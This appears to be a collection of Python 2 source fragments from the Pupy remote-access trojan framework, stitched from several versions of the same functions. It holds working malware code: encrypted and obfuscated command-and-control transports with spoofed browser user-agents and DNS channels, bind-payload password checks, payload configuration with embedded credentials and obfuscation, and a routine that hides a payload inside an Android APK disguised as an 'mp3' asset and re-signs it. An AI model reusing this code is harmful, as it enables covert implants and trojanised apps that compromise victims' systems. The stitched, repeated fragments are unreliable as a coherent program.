def __init__(self, *args, **kwargs): self.ssl_auth = kwargs.pop('ssl_auth', True) self.hostname = kwargs.pop('hostname', None) if self.ssl_auth: self.cert_reqs = ssl.CERT_REQUIRED try: import pupy_credentials self.SSL_CLIENT_CERT = pupy_credentials.SSL_CLIENT_CERT self.SSL_CLIENT_KEY = pupy_credentials.SSL_CLIENT_KEY self.SSL_CA_CERT = pupy_credentials.SSL_CA_CERT self.ROLE = 'CLIENT' except: from pupylib.PupyCredentials import Credentials credentials = Credentials() self.SSL_CLIENT_CERT = credentials['SSL_CLIENT_CERT'] self.SSL_CLIENT_KEY = credentials['SSL_CLIENT_KEY'] self.SSL_CA_CERT = credentials['SSL_CA_CERT'] self.ROLE = credentials.role else: self.cert_reqs = ssl.CERT_NONE self.ciphers = 'HIGH:!aNULL:!MD5:!RC4:!3DES:!DES' self.ssl_version = ssl.PROTOCOL_SSLv23 super(PupySSLClient, self).__init__(*args, **kwargs)
def main(): from pupylib.utils.term import hint_to_text from traceback import print_exc def display(data): print hint_to_text(data) Credentials.DEFAULT_ROLE = 'CLIENT' config = PupyConfig() Credentials(config=config, validate=True) parser = get_parser(argparse.ArgumentParser, config) try: args = parser.parse_args() pupygen(args, config, None, display) except NoOutput: sys.exit(0) except InvalidOptions: sys.exit(1) except (ValueError, EncryptionError), e: if args.debug: print_exc() display(Error(e))
def set(self, conf, link_ip, port, ssl, useTargetProxy): self.payload_conf = conf self.link_ip = link_ip self.link_port = port self.random_reflectivepeinj_name = ''.join([ random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in range(0, random.randint(8, 12)) ]) self.useTargetProxy = useTargetProxy self.ssl = ssl if self.ssl: credentials = Credentials() keystr = credentials['SSL_BIND_KEY'] certstr = credentials['SSL_BIND_CERT'] fd_cert_path, tmp_cert_path = tempfile.mkstemp() fd_key_path, tmp_key_path = tempfile.mkstemp() os.write(fd_cert_path, certstr) os.close(fd_cert_path) os.write(fd_key_path, keystr) os.close(fd_key_path) self.socket = wrap_socket(self.socket, certfile=tmp_cert_path, keyfile=tmp_key_path, server_side=True) self.tmp_cert_path = tmp_cert_path self.tmp_key_path = tmp_key_path
def get_raw_conf(conf, obfuscate=False): credentials = Credentials(role='client') if not "offline_script" in conf: offline_script = "" else: offline_script = conf["offline_script"] obf_func = lambda x: x if obfuscate: obf_func = compress_encode_obfs l = launchers[conf['launcher']]() l.parse_args(conf['launcher_args']) required_credentials = set(l.credentials) \ if hasattr(l, 'credentials') else set([]) transport = l.get_transport() transports_list = [] if transport: transports_list = [transport] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) print colorize("[+] ", "red") + 'Required credentials:\n{}'.format( colorize("[+] ", "red") + ', '.join(required_credentials)) embedded_credentials = '\n'.join([ '{}={}'.format(credential, repr(credentials[credential])) \ for credential in required_credentials if credentials[credential] is not None ])+'\n' config = '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr(cPickle.dumps({'pupy_credentials.py': embedded_credentials}))), '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr( cPickle.dumps( gen_package_pickled_dic( ROOT + os.sep, 'network.transports.{}'.format(transport))))) for transport in transports_list ]), 'import sys', 'sys.modules.pop("network.conf")', 'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])), 'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), offline_script ]) return obf_func(config)
def __init__(self, *args, **kwargs): Transport.__init__(self, *args, **kwargs) try: import pupy_credentials RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PRIV_KEY except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY'] RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY'] user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" if self.launcher_type == LAUNCHER_TYPE_BIND: self.client_transport = chain_transports( PupyWebSocketClient.custom(user_agent=user_agent), RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256), ) self.server_transport = chain_transports( PupyWebSocketServer.custom(verify_user_agent=user_agent), RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256), ) else: self.client_transport = chain_transports( PupyWebSocketClient.custom(user_agent=user_agent), RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256), ) self.server_transport = chain_transports( PupyWebSocketServer.custom(verify_user_agent=user_agent), RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256), )
def ssl_authenticator(): keystr = b'' certstr = b'' client_cert_required = True try: import pupy_credentials keystr = pupy_credentials.SSL_BIND_KEY certstr = pupy_credentials.SSL_BIND_CERT castr = pupy_credentials.SSL_CA_CERT role = 'CLIENT' except: from pupylib.PupyConfig import PupyConfig from pupylib.PupyCredentials import Credentials config = PupyConfig() credentials = Credentials() client_cert_required = config.getboolean('ssl', 'client_cert_required') keystr = credentials['SSL_BIND_KEY'] certstr = credentials['SSL_BIND_CERT'] castr = credentials['SSL_CA_CERT'] role = credentials.role return PupySSLAuthenticator(role, keystr, certstr, castr, client_cert_required=client_cert_required)
def __init__(self, *args, **kwargs): Transport.__init__(self, *args, **kwargs) try: import pupy_credentials RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PRIV_KEY except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY'] RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY'] if self.launcher_type == LAUNCHER_TYPE_BIND: self.client_transport = RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256) self.server_transport = RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256) else: self.client_transport = RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256) self.server_transport = RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256)
def set(self, conf, sslEnabled, stage1, stage2_x86, stage2_x64): self.payload_conf = conf self.stage1 = stage1 self.stage2_x86 = stage2_x86 self.stage2_x64 = stage2_x64 if sslEnabled: credentials = Credentials() keystr = credentials['SSL_BIND_KEY'] certstr = credentials['SSL_BIND_CERT'] fd_cert_path, tmp_cert_path = tempfile.mkstemp() fd_key_path, tmp_key_path = tempfile.mkstemp() os.write(fd_cert_path, certstr) os.close(fd_cert_path) os.write(fd_key_path, keystr) os.close(fd_key_path) self.socket = wrap_socket(self.socket, certfile=tmp_cert_path, keyfile=tmp_key_path, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1) self.tmp_cert_path = tmp_cert_path self.tmp_key_path = tmp_key_path
def on_connect(self): pupy.dprint('Bind service: on_connect called') try: from pupy_credentials import BIND_PAYLOADS_PASSWORD password = BIND_PAYLOADS_PASSWORD pupy.dprint('Expected password: {}', repr(password)) except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() password = credentials['BIND_PAYLOADS_PASSWORD'] pupy.dprint('Expected password: {} (fallback)', repr(password)) remote_password = self._conn.root.get_password() pupy.dprint('Remote password: {}', remote_password) if remote_password != password: self._conn.close() raise KeyboardInterrupt("wrong password") super(BindSlaveService, self).on_connect()
def __init__(self, *args, **kwargs): Transport.__init__(self, *args, **kwargs) try: import pupy_credentials RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PRIV_KEY SCRAMBLESUIT_PASSWD = pupy_credentials.SCRAMBLESUIT_PASSWD except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY'] RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY'] SCRAMBLESUIT_PASSWD = credentials['SCRAMBLESUIT_PASSWD'] self.client_transport_kwargs.update({ 'host': None, 'path': '/ws/' + ''.join(md5(SCRAMBLESUIT_PASSWD).hexdigest()[:8]), 'user-agent': DEFAULT_USER_AGENT }) self.server_transport_kwargs.update({ 'path': '/ws/' + ''.join(md5(SCRAMBLESUIT_PASSWD).hexdigest()[:8]), 'user-agent': DEFAULT_USER_AGENT }) if self.launcher_type == LAUNCHER_TYPE_BIND: self.client_transport = chain_transports( PupyWebSocketClient, RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256), ) self.server_transport = chain_transports( PupyWebSocketServer, RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256), ) else: self.client_transport = chain_transports( PupyWebSocketClient, RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256), ) self.server_transport = chain_transports( PupyWebSocketServer, RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256), )
def on_connect(self): try: from pupy_credentials import BIND_PAYLOADS_PASSWORD password = BIND_PAYLOADS_PASSWORD except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() password = credentials['BIND_PAYLOADS_PASSWORD'] if self._conn.root.get_password() != password: self._conn.close() raise KeyboardInterrupt("wrong password") super(BindSlaveService, self).on_connect()
def get_edit_apk(display, path, conf, compressed_config=None, debug=False): credentials = Credentials(role='control') priv_key = credentials['APK_PRIV_KEY'] pub_key = credentials['APK_PUB_KEY'] if not priv_key or not pub_key: raise ValueError( 'CONTROL_APK_PRIV_KEY/CONTROL_APK_PUB_KEY credentials missing (old credentials)' ) tempdir = tempfile.mkdtemp(prefix="tmp_pupy_") fd, tempapk = tempfile.mkstemp(prefix="tmp_pupy_") try: packed_payload = pack_py_payload(display, get_raw_conf(display, conf), debug, False) shutil.copy(path, tempapk) #extracting the python-for-android install tar from the apk zf = zipfile.ZipFile(path, 'r') zf.extract("assets/private.mp3", tempdir) zf.close() with open(os.path.join(tempdir, "pp.py"), 'w') as w: w.write(packed_payload) import py_compile py_compile.compile(os.path.join(tempdir, "pp.py"), os.path.join(tempdir, "pp.pyo")) display(Success('Packaging the apk ... (can take 10-20 seconds)')) #updating the tar with the new config updateTar(os.path.join(tempdir, "assets/private.mp3"), "pp.pyo", os.path.join(tempdir, "pp.pyo")) #repacking the tar in the apk with open(os.path.join(tempdir, "assets/private.mp3"), 'r') as t: updateZip(tempapk, "assets/private.mp3", t.read()) # signing the tar result = BytesIO() jarsigner(priv_key, pub_key, tempapk, result) return result.getvalue() finally: #cleaning up shutil.rmtree(tempdir, ignore_errors=True) os.unlink(tempapk)
def __init__(self, domain): self.stream = None self.commands = [] self.lock = Lock() self.new_commands = Event() try: from pupy_credentials import DNSCNC_PUB_KEY key = DNSCNC_PUB_KEY except: from pupylib.PupyCredentials import Credentials credentials = Credentials() key = credentials['DNSCNC_PUB_KEY'] DnsCommandsClient.__init__(self, domain, key=key)
def __init__(self, domain, ns=None, qtype='A', ns_timeout=3): self.stream = None self.commands = [] self.lock = Lock() self.new_commands = Event() try: import pupy_credentials key = pupy_credentials.DNSCNC_PUB_KEY_V2 except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() key = credentials['DNSCNC_PUB_KEY_V2'] DnsCommandsClient.__init__(self, domain, key, ns, qtype, ns_timeout=ns_timeout)
def __init__(self, *args, **kwargs): Transport.__init__(self, *args, **kwargs) self.client_transport_kwargs.update({'host': None}) try: import pupy_credentials RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PRIV_KEY except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY'] RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY'] user_agent = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) '\ 'Chrome/41.0.2228.0 Safari/537.36' if self.launcher_type == LAUNCHER_TYPE_BIND: self.client_transport = chain_transports( PupyHTTPClient.custom(keep_alive=True, user_agent=user_agent), RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256), ) self.server_transport = chain_transports( PupyHTTPServer.custom(verify_user_agent=user_agent), RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256), ) else: self.client_transport = chain_transports( PupyHTTPClient.custom(keep_alive=True, user_agent=user_agent), RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256), ) self.server_transport = chain_transports( PupyHTTPServer.custom(verify_user_agent=user_agent), RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256), )
def on_connect(self): self.exposed_namespace = {} self.exposed_cleanups = [] self._conn._config.update(REVERSE_SLAVE_CONF) import pupy try: from pupy_credentials import BIND_PAYLOADS_PASSWORD password = BIND_PAYLOADS_PASSWORD except: from pupylib.PupyCredentials import Credentials credentials = Credentials() password = credentials['BIND_PAYLOADS_PASSWORD'] if self._conn.root.get_password() != password: self._conn.close() raise KeyboardInterrupt("wrong password") pupy.namespace = UpdatableModuleNamespace(self.exposed_getmodule) self._conn.root.set_modules(pupy.namespace)
def __init__(self, *args, **kwargs): Transport.__init__(self, *args, **kwargs) try: import pupy_credentials PUB_KEY = pupy_credentials.ECPV_RC4_PUBLIC_KEY PRIV_KEY = pupy_credentials.ECPV_RC4_PRIVATE_KEY except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() PUB_KEY = credentials['ECPV_RC4_PUBLIC_KEY'] PRIV_KEY = credentials['ECPV_RC4_PRIVATE_KEY'] if self.launcher_type == LAUNCHER_TYPE_BIND: self.client_transport = EC4TransportServer.custom(privkey=PRIV_KEY) self.server_transport = EC4TransportClient.custom(pubkey=PUB_KEY) else: self.server_transport = EC4TransportServer.custom(privkey=PRIV_KEY) self.client_transport = EC4TransportClient.custom(pubkey=PUB_KEY)
def __init__(self, *args, **kwargs): Transport.__init__(self, *args, **kwargs) try: import pupy_credentials RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY SCRAMBLESUIT_PASSWD = pupy_credentials.SCRAMBLESUIT_PASSWD except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY'] RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY'] SCRAMBLESUIT_PASSWD = credentials['SCRAMBLESUIT_PASSWD'] self.client_transport_kwargs = {'password': SCRAMBLESUIT_PASSWD} self.server_transport_kwargs = {'password': SCRAMBLESUIT_PASSWD} if self.launcher_type == LAUNCHER_TYPE_BIND: self.client_transport = chain_transports( ScrambleSuitClient, RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256)) self.server_transport = chain_transports( ScrambleSuitServer, RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256)) else: self.client_transport = chain_transports( ScrambleSuitClient, RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256)) self.server_transport = chain_transports( ScrambleSuitServer, RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256))
def __init__(self, *args, **kwargs): try: import pupy_credentials self.SSL_CLIENT_CERT = pupy_credentials.SSL_CLIENT_CERT self.SSL_CLIENT_KEY = pupy_credentials.SSL_CLIENT_KEY self.SSL_CA_CERT = pupy_credentials.SSL_CA_CERT self.ROLE = 'CLIENT' except: from pupylib.PupyCredentials import Credentials credentials = Credentials() self.SSL_CLIENT_CERT = credentials['SSL_CLIENT_CERT'] self.SSL_CLIENT_KEY = credentials['SSL_CLIENT_KEY'] self.SSL_CA_CERT = credentials['SSL_CA_CERT'] self.ROLE = credentials.role self.ciphers = 'HIGH:!aNULL:!MD5:!RC4:!3DES:!DES:!AES128@STRENGTH' self.cert_reqs = ssl.CERT_REQUIRED self.ssl_version = ssl.PROTOCOL_SSLv23 #alias for PROTOCOL_TLS for recent versions of python but works with older version missing TLS super(PupySSLClient, self).__init__(*args, **kwargs)
def __init__(self, *args, **kwargs): try: import pupy_credentials self.SSL_CLIENT_CERT = pupy_credentials.SSL_CLIENT_CERT self.SSL_CLIENT_KEY = pupy_credentials.SSL_CLIENT_KEY self.SSL_CA_CERT = pupy_credentials.SSL_CA_CERT self.ROLE = 'CLIENT' except: from pupylib.PupyCredentials import Credentials credentials = Credentials() self.SSL_CLIENT_CERT = credentials['SSL_CLIENT_CERT'] self.SSL_CLIENT_KEY = credentials['SSL_CLIENT_KEY'] self.SSL_CA_CERT = credentials['SSL_CA_CERT'] self.ROLE = credentials.role self.ciphers = 'SHA256+AES256:SHA1+AES256:@STRENGTH' self.cert_reqs = ssl.CERT_REQUIRED self.ssl_version = ssl.PROTOCOL_TLSv1 super(PupySSLClient, self).__init__(*args, **kwargs)
def ssl_authenticator(): keystr = b'' certstr = b'' server_side = True try: import pupy_credentials assert(pupy_credentials) server_side = False except ImportError: from pupylib.PupyCredentials import Credentials credentials = Credentials() keystr = credentials['SSL_BIND_KEY'] certstr = credentials['SSL_BIND_CERT'] castr = credentials['SSL_CA_CERT'] role = credentials.role return DummySSLAuthenticator( role, keystr, certstr, castr, server_side )
def exposed_get_password(self): credentials = Credentials() return credentials['BIND_PAYLOADS_PASSWORD']
def get_raw_conf(display, conf, verbose=False): credentials = Credentials(role='client') if 'offline_script' not in conf: offline_script = '' else: offline_script = conf['offline_script'] launcher = launchers[conf['launcher']]() launcher.parse_args(conf['launcher_args']) required_credentials = set(launcher.credentials) \ if hasattr(launcher, 'credentials') else set([]) transport = launcher.transport transports_list = [] if transport: transports_list = [transport] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) available = [] not_available = [] for cred in required_credentials: if credentials[cred]: available.append(cred) else: not_available.append(cred) display( List(available, bullet=Color('+', 'green'), caption=Success('Required credentials (found)'))) if not_available: display( List(not_available, bullet=Color('-', 'red'), caption=Error('Required credentials (not found)'))) embedded_credentials = { credential: credentials[credential] for credential in required_credentials if credentials[credential] is not None } if verbose: config_table = [{ 'KEY': k, 'VALUE': 'PRESENT' if (k in ('offline_script') and v) else (unicode(v) if type(v) not in (tuple, list, set) else ' '.join( unicode(x) for x in v)) } for k, v in conf.iteritems() if v] display( Table(config_table, ['KEY', 'VALUE'], Color('Configuration', 'yellow'), vspace=1)) config = { 'credentials': embedded_credentials, 'scriptlets': [offline_script] or [], 'debug': conf.get('debug', False), 'launcher': conf['launcher'], 'launcher_args': conf['launcher_args'], 'cid': conf.get('cid', 0x31338), 'delays': conf.get('delays', [(10, 5, 10), (50, 30, 50), (-1, 150, 300)]) } return config
def get_raw_conf(display, conf, obfuscate=False, verbose=False): credentials = Credentials(role='client') if "offline_script" not in conf: offline_script="" else: offline_script=conf["offline_script"] launcher = launchers[conf['launcher']]() launcher.parse_args(conf['launcher_args']) required_credentials = set(launcher.credentials) \ if hasattr(launcher, 'credentials') else set([]) transport = launcher.get_transport() transports_list = [] if transport: transports_list = [transport] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) available = [] not_available = [] for cred in required_credentials: if credentials[cred]: available.append(cred) else: not_available.append(cred) display( List(available, bullet=Color('+', 'green'), caption=Success('Required credentials (found)'))) if not_available: display( List(not_available, bullet=Color('-', 'red'), caption=Error('Required credentials (not found)'))) embedded_credentials = '\n'.join([ '{}={}'.format(credential, repr(credentials[credential])) \ for credential in required_credentials if credentials[credential] is not None ])+'\n' if verbose: config_table = [{ 'KEY': k, 'VALUE': 'PRESENT' if (k in ('offline_script') and v) else ( unicode(v) if type(v) not in (tuple,list,set) else ' '.join( unicode(x) for x in v)) } for k,v in conf.iteritems() if v] display(Table(config_table, ['KEY', 'VALUE'], Color('Configuration', 'yellow'), vspace=1)) config = '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr(cPickle.dumps({ 'pupy_credentials.pye': bytes(pupycompile(embedded_credentials, obfuscate=True)) }))), dependencies.importer(set( 'network.transports.{}'.format(transport) for transport in transports_list ), path=ROOT), 'import sys', 'sys.modules.pop("network.conf", "")', 'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])), 'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), 'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)), 'DELAYS={}'.format(repr(conf.get('delays', [ (10, 5, 10), (50, 30, 50), (-1, 150, 300)]))), 'pupy.cid = CONFIGURATION_CID', 'debug={}'.format(bool(conf.get('debug', False))), 'SCRIPTLETS={}'.format(repr(offline_script) if offline_script else '""') ]) return compress_encode_obfs(config) if obfuscate else config
def get_raw_conf(conf, obfuscate=False, verbose=False): credentials = Credentials(role='client') if not "offline_script" in conf: offline_script="" else: offline_script=conf["offline_script"] obf_func=lambda x:x if obfuscate: obf_func=compress_encode_obfs launcher = launchers[conf['launcher']]() launcher.parse_args(conf['launcher_args']) required_credentials = set(launcher.credentials) \ if hasattr(launcher, 'credentials') else set([]) transport = launcher.get_transport() transports_list = [] if transport: transports_list = [ transport ] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) available = [] not_available = [] for cred in required_credentials: if credentials[cred]: available.append(cred) else: not_available.append(cred) print colorize("[+] ", "green") + 'Required credentials (found):\n{}'.format( colorize("[+] ", "green") + ', '.join(available)) if not_available: print colorize("[-] ", "red") + 'Required credentials (not found):\n{}'.format( colorize("[-] ", "red") + ', '.join(not_available)) embedded_credentials = '\n'.join([ '{}={}'.format(credential, repr(credentials[credential])) \ for credential in required_credentials if credentials[credential] is not None ])+'\n' if verbose: for k, v in conf.iteritems(): if k in ('offline_script'): continue print colorize("[C] {}: {}".format(k, v), "yellow") config = '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr(cPickle.dumps({ 'pupy_credentials.pye' : bytes(pupycompile(embedded_credentials, obfuscate=True)) }))), dependencies.importer(set( 'network.transports.{}'.format(transport) for transport in transports_list ), path=ROOT), 'import sys', 'sys.modules.pop("network.conf")', 'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])), 'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), 'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)), 'pupy.cid = CONFIGURATION_CID', 'debug={}'.format(bool(conf.get('debug', False))), offline_script ]) return obf_func(config)
display(Success('SCRIPTLETS: {}'.format(args.scriptlet))) display(Success('DEBUG: {}'.format(args.debug))) return os.path.abspath(outpath) if __name__ == '__main__': from pupylib.utils.term import hint_to_text from traceback import print_exc def display(data): print hint_to_text(data) Credentials.DEFAULT_ROLE = 'CLIENT' config = PupyConfig() Credentials(config=config, validate=True) parser = get_parser(argparse.ArgumentParser, config) try: args = parser.parse_args() pupygen(args, config, display) except NoOutput: sys.exit(0) except InvalidOptions: sys.exit(1) except (ValueError, EncryptionError), e: if args.debug: print_exc()